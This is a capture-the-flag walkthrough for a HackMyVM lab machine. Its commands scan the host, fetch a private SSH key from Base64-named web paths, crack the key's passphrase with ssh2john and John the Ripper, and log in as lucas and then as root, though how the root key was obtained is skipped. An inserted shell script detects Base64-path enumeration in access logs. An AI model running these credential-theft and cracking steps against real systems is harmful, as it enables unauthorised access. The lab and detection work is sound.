Machine downloaded from https://hackmyvm.eu/
Difficulty: Easy
OS: Linux
sudo netdiscover -i eth0 -r 192.168.5.0/24
The IP address is 192.168.5.105
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -vvv 192.168.5.105 -oN report.txt
This machine exposes two services: SSH on port 22 and HTTP on port 80.
The output:
ALL, absolutely ALL that you need is in BASE64.
Including the password that you need :)
Remember, BASE64 has the answer to all your questions.
-lucas
#!/bin/bash
# Specify the file path or name
file="common.txt"
# Check if the file exists
if [ -f "$file" ]; then
    # Read the file line by line (including a last line with no trailing newline)
    while IFS= read -r line || [ -n "$line" ]
    do
        # Base64-encode each line (with its newline) and append it to the output list
        printf '%s\n' "$line" | base64 >> base64_common.txt
    done < "$file"
else
    echo "File not found!"
fi
wget -qO- http://192.168.5.105/aWRfcnNhCg== | base64 -d
wget -qO- http://192.168.5.105/cm9ib3RzLnR4dAo= | base64 -d
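Seen from the server side, requests for Base64-named paths like the ones above leave a distinctive trace in the web access log. The following is an added example, not part of the original writeup: it flags clients that request several paths whose names decode from Base64 to printable text. The log lines, the client addresses 192.168.5.50, .30 and .20, the function names and the threshold are constructed for illustration.

```shell
#!/bin/bash
# Added example: flag clients that request many Base64-named paths.
# The log lines are constructed samples; only the two long path names come from the writeup.
SAMPLE_LOG='192.168.5.50 - - [01/Jan/2024:10:00:01 +0000] "GET /YWRtaW4K HTTP/1.1" 404 153
192.168.5.50 - - [01/Jan/2024:10:00:01 +0000] "GET /bG9naW4K HTTP/1.1" 404 153
192.168.5.50 - - [01/Jan/2024:10:00:02 +0000] "GET /aWRfcnNhCg== HTTP/1.1" 200 2500
192.168.5.50 - - [01/Jan/2024:10:00:02 +0000] "GET /cm9ib3RzLnR4dAo= HTTP/1.1" 200 60
192.168.5.30 - - [01/Jan/2024:10:05:00 +0000] "GET /aWRfcnNhCg== HTTP/1.1" 200 2500
192.168.5.20 - - [01/Jan/2024:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 300
192.168.5.20 - - [01/Jan/2024:10:06:01 +0000] "GET /favicon.ico HTTP/1.1" 404 153'

# Succeeds when $1 is well-formed Base64 that decodes to printable text.
is_b64_text() {
    local s=$1 decoded
    # Require at least 8 characters, a length that is a multiple of 4,
    # and only the standard Base64 alphabet with up to two '=' of padding.
    [ "${#s}" -ge 8 ] && [ $(( ${#s} % 4 )) -eq 0 ] || return 1
    printf '%s' "$s" | grep -Eq '^[A-Za-z0-9+/]+={0,2}$' || return 1
    decoded=$(printf '%s' "$s" | base64 -d 2>/dev/null) || return 1
    [ -n "$decoded" ] || return 1
    # Ordinary words that happen to fit the alphabet usually decode to binary junk.
    ! printf '%s' "$decoded" | LC_ALL=C grep -q '[^[:print:]]'
}

# Reads a combined-format access log on stdin and prints every client IP
# that requested at least $1 paths whose name passes is_b64_text.
flag_b64_enumerators() {
    local threshold=$1 ip path name
    awk '{print $1, $7}' | while read -r ip path; do
        name=${path#/}        # drop the leading slash
        name=${name%%\?*}     # drop any query string
        if is_b64_text "$name"; then printf '%s\n' "$ip"; fi
    done | sort | uniq -c | awk -v t="$threshold" '$1 >= t {print $2}'
}

printf '%s\n' "$SAMPLE_LOG" | flag_b64_enumerators 3   # prints 192.168.5.50
```

A single Base64-looking request (192.168.5.30 here) stays below the threshold, so one-off hits from legitimate links do not raise an alert.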
ssh -i id_rsa lucas@192.168.5.105
Using a combination of ssh2john and John the Ripper with the passwords found in the page source, we can try to find the key's passphrase.
ssh2john id_rsa > idrsa_john
john --wordlist=base64_list.txt idrsa_john
The passphrase is aWxvdmV5b3UK (iloveyou in Base64)
ssh -i id_rsa lucas@192.168.5.105
sudo chmod 600 rootid_rsa
ssh -i rootid_rsa root@192.168.5.105